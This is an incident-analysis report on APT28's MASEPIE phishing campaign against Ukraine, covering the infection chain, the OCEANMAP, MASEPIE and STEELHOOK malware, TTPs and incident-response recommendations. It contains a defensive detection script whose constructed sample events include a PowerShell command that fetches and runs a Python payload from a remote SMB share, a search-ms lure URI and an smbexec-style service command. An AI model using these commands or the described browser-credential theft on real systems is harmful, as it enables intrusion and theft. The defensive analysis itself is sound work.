Analysis of a Recent Cybersecurity Incident

Title:

Russian Military Hackers Target Ukraine with MASEPIE Malware

Introduction:

 This report analyses a recent cybersecurity incident in which Russian state-sponsored threat actors
targeted Ukraine with a new malware strain named 'MASEPIE'.
 The incident, which occurred between December 15 and 25, 2023, underscores the urgency
of understanding and evaluating the incident response carried out by Ukraine's
Computer Emergency Response Team (CERT-UA).
 During December 15-25, 2023, several waves of e-mails containing links to "documents" were
detected at government organizations; following the links led to the recipients' computers
being infected with malware.

Incident Overview:

 The threat actors, identified as APT28 or Fancy Bear, employed a phishing campaign to
deliver the MASEPIE malware.
 The campaign targeted government entities, businesses, universities, research institutes,
and think tanks in Ukraine.
 The phishing emails, urging recipients to click on a seemingly important document link,
redirected victims to malicious web resources.
 These resources utilized JavaScript to deploy a Windows shortcut file (LNK), triggering
PowerShell commands that initiated the infection chain for the 'MASEPIE' malware.
Investigating the incident:

 The investigation found that the links redirect the victim to a web resource where
JavaScript, combined with the Windows Search application protocol (the 'search-ms:' URI
scheme, written "ms-search" in the CERT-UA advisory), causes a shortcut (LNK) file to be
downloaded. Opening the shortcut launches a PowerShell command that downloads from a
remote SMB share and opens a decoy document, and also fetches a Python interpreter
together with the file Client.py, which is classified as MASEPIE.
 Using MASEPIE, the attackers load and launch OPENSSH (to build a tunnel), STEELHOOK
PowerShell scripts (stealing data from the Chrome and Edge browsers), and the OCEANMAP
backdoor on the computer.
 In addition, IMPACKET, SMBEXEC and similar tools are placed on the computer within an hour
of the initial compromise and used for network reconnaissance and attempts at lateral
movement.
 It is therefore clear that the operation also aims to extend the attack to the
organization's entire information and communication system.
 Thus, the compromise of any single computer poses a threat to the entire network.
For reference:

 OCEANMAP

 It is a malicious program developed using the C# programming language.
 Its main functionality is executing commands via cmd.exe.
 The IMAP protocol is used as the control channel.
 Commands, in base64-encoded form, are placed in message drafts (the "Drafts" folder) of
the corresponding e-mail mailboxes; each draft contains the computer name, the user name
and the OS version.
 The results of command execution are stored in the inbox ("INBOX").
 A configuration update mechanism (command check interval, addresses and authentication
data of the mail accounts) is implemented by patching the backdoor executable and
restarting the process.
 Persistence is ensured by creating a .URL file 'VMSearch.url' in the autorun (Startup) directory.

 MASEPIE

 It is a malicious program developed using the Python programming language.
 Its main functionality is uploading/downloading files and executing commands.
 The TCP protocol is used as the control channel.
 Data is encrypted with AES-128-CBC; the key, a sequence of 16 random bytes, is
generated when the connection is established.
 Backdoor persistence is ensured by creating the 'SysUpdate' value under the 'Run' key
of the Windows registry, as well as by placing the LNK file 'SystemUpdate.lnk' in the
Startup directory.

 STEELHOOK

 It is a PowerShell script that steals Internet browser data (the "Login Data" and
"Local State" files) and the DPAPI master key, sending them to the control server in
base64-encoded form via an HTTP POST request. The "Local State" file holds the browser's
DPAPI-protected encryption key, so collecting the DPAPI master key alongside it is what
lets the credentials stored in "Login Data" be decrypted off the victim machine.
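To make the delivery chain and the persistence artifacts above concrete, here is an added triage example (my own code, not CERT-UA's tooling and not any of the malware samples) that evaluates Sysmon-style event records against the indicators named in this report: the 'search-ms:' handler pointed at a remote share, PowerShell pulling a Python interpreter over SMB, the 'SysUpdate' Run value, the 'SystemUpdate.lnk' and 'VMSearch.url' Startup items, and a service install matching Impacket smbexec's default service name and command pattern. The smbexec specifics (service name BTOBTO, the __output/execute.bat command) are an assumption drawn from the tool's defaults, not from the advisory, and the event records are constructed for illustration.

```python
"""Triage rules for the MASEPIE delivery chain, persistence artifacts and
smbexec-style lateral movement, evaluated over Sysmon-style events.

Added example, not CERT-UA tooling. The events below are constructed for
illustration; field names follow Sysmon's conventions (EventID, Image,
CommandLine, TargetObject, TargetFilename) plus ServiceName/ImagePath for
a System-log 7045 service-install record.
"""
import re
from typing import List, Optional, Tuple

# Artifact names taken from the CERT-UA advisory summarised above.
RUN_KEY_VALUE = "SysUpdate"                              # MASEPIE Run value
STARTUP_FILES = {"systemupdate.lnk", "vmsearch.url"}     # MASEPIE / OCEANMAP

# Delivery stage: search-ms: handler pointed at a remote share, then PowerShell
# pulling a Python interpreter and script over SMB (UNC path).
SEARCH_MS = re.compile(r"search-ms:", re.I)
UNC_PATH = re.compile(r"\\\\[\w.-]+\\[\w$.-]+")
PYTHON_EXE = re.compile(r"\bpythonw?\.exe\b", re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run\\", re.I)

# Impacket smbexec defaults (assumption from the tool's source, not from the
# advisory): a service named BTOBTO whose ImagePath echoes each command into
# \\127.0.0.1\C$\__output via a temporary execute.bat.
SMBEXEC_SERVICE = "BTOBTO"
SMBEXEC_IMAGE = re.compile(r"__output|execute\.bat", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def classify(ev: dict) -> Optional[str]:
    """Return a verdict string for a suspicious event, or None if benign."""
    eid = ev.get("EventID")
    if eid == 1:  # process creation
        image = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "")
        if image.endswith("explorer.exe") and SEARCH_MS.search(cmd) and UNC_PATH.search(cmd):
            return "delivery: search-ms: URI handler pointed at a remote share"
        if image.endswith("powershell.exe") and UNC_PATH.search(cmd) and PYTHON_EXE.search(cmd):
            return "delivery: PowerShell fetches a Python interpreter over SMB and runs a script"
    elif eid == 11:  # file created
        target = ev.get("TargetFilename", "")
        if STARTUP_DIR.search(target) and _basename(target).lower() in STARTUP_FILES:
            return f"persistence: Startup item {_basename(target)}"
    elif eid == 13:  # registry value set
        target = ev.get("TargetObject", "")
        if RUN_KEY.search(target) and _basename(target) == RUN_KEY_VALUE:
            return f"persistence: Run value {RUN_KEY_VALUE}"
    elif eid == 7045:  # service installed (System log)
        if ev.get("ServiceName") == SMBEXEC_SERVICE or SMBEXEC_IMAGE.search(ev.get("ImagePath", "")):
            return "lateral movement: smbexec-style service install"
    return None


def triage(events: List[dict]) -> List[Tuple[int, str]]:
    """Run classify() over an event list; returns (index, verdict) pairs."""
    hits = []
    for i, ev in enumerate(events):
        verdict = classify(ev)
        if verdict:
            hits.append((i, verdict))
    return hits


# Constructed sample telemetry (not real logs): one event per stage plus a benign one.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "search-ms:query=Document&crumb=location:\\203.0.113.10\share&displayname=Downloads"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "copy \\203.0.113.10\share\python.exe $env:TEMP; & $env:TEMP\python.exe $env:TEMP\Client.py"'},
    {"EventID": 13, "Image": r"C:\Users\u\AppData\Local\Temp\python.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate"},
    {"EventID": 11, "Image": r"C:\Users\u\AppData\Local\Temp\python.exe",
     "TargetFilename": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.lnk"},
    {"EventID": 7045, "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for idx, verdict in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {verdict}")
```

The rules deliberately key on behaviour rather than on file hashes: the UNC-plus-python.exe pattern in a PowerShell command line and a Startup or Run entry written by a process running out of a temp directory survive a rename of Client.py, whereas the literal names SysUpdate, SystemUpdate.lnk and VMSearch.url are cheap to check on the hosts already identified in the report.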

Tactics, Techniques, and Procedures (TTPs) used:

Tactics:
Phishing: The primary delivery method involved sending phishing emails carrying links to
what appeared to be legitimate documents.
Techniques:

1- Malware: The links led to a novel malware strain called Masepie, written in Python,
capable of:
 Uploading and downloading files.
 Executing commands.
 Deploying additional malware:

 Steelhook: A PowerShell script that steals web browser data.

 Oceanmap: A backdoor that uses e-mail (IMAP) as its control channel.

2- Open-source tools: After initial compromise, attackers used readily available tools like
Impacket and Smbexec for:

 Reconnaissance.
 Lateral movement.
Sub-techniques:

 Social engineering: Phishing emails likely used tailored content and sender names to
appear trustworthy and entice victims to follow the link.
 Obfuscation: Masepie malware reportedly employed techniques to evade detection by
security software.
 Persistence: The attackers utilized Masepie to establish remote access, allowing them to
maintain long-term control over compromised systems.

These TTPs demonstrate a multi-layered approach by APT28:

 Initial compromise: Lure victims into downloading and opening the malicious shortcut
through phishing.
 Lateral movement: Use Masepie to stage Impacket, Smbexec and additional malware for
reconnaissance and deeper network infiltration.
 Data exfiltration: Steal sensitive information using tools like Steelhook.
 Command and control: Establish persistent access with Oceanmap for ongoing control
and potential future operations.

Incident Response Plan/Strategy:

 CERT-UA responded to the incident by identifying the malware's characteristics and
behavior.
 MASEPIE, upon infection, modified the Windows Registry and added a deceptive LNK
file to the Windows Startup folder, ensuring persistence on the infected device.
 The malware's primary objectives were to download additional malware and steal data.

Breakdown of Incident Response Plan:

1. Preparation: CERT-UA demonstrated preparedness in identifying and responding to the
incident swiftly.
2. Detection: The detection phase involved recognizing the phishing campaign, malware
characteristics, and its propagation mechanisms.
3. Containment: Measures were taken to isolate and prevent the lateral movement of the
malware within the network.
4. Eradication: CERT-UA focused on removing the malware and its artifacts, including
modifications to the Registry and Startup folder.
5. Recovery: Efforts were made to restore affected systems and enhance security
measures to prevent future incidents.
6. Lessons Learned: An analysis of the incident provided insights for improving future
incident response strategies.
Comparison with Best Practices:

 Research identified incident response best practices from frameworks such as NIST and
ISO/IEC 27035.
 While CERT-UA demonstrated promptness, there are areas where alignment with best
practices can be enhanced, particularly in proactive measures for preventing initial
compromises.

Recommendations for Improvement:

1. Strengthen proactive measures to prevent phishing attacks, possibly through user education
and advanced email filtering.
2. Enhance detection capabilities, including the use of threat intelligence feeds.
3. Improve containment strategies to mitigate lateral movement swiftly.
4. Enhance recovery processes for quicker system restoration.
5. Conduct regular simulations and exercises to refine incident response procedures.

Conclusion:
 The incident underscores the importance of a robust incident response plan.
 While CERT-UA exhibited effectiveness, continuous refinement is crucial to stay ahead of evolving
threats.
 The proposed recommendations aim to fortify Ukraine's cybersecurity posture against sophisticated
threat actors.

References:
https://www.bleepingcomputer.com/news/security/russian-military-hackers-target-ukraine-with-new-masepie-malware/
https://www.broadcom.com/support/security-center/protection-bulletin/apt28-group-targets-ukraine-with-new-masepie-malware
https://cert.gov.ua/article/6276894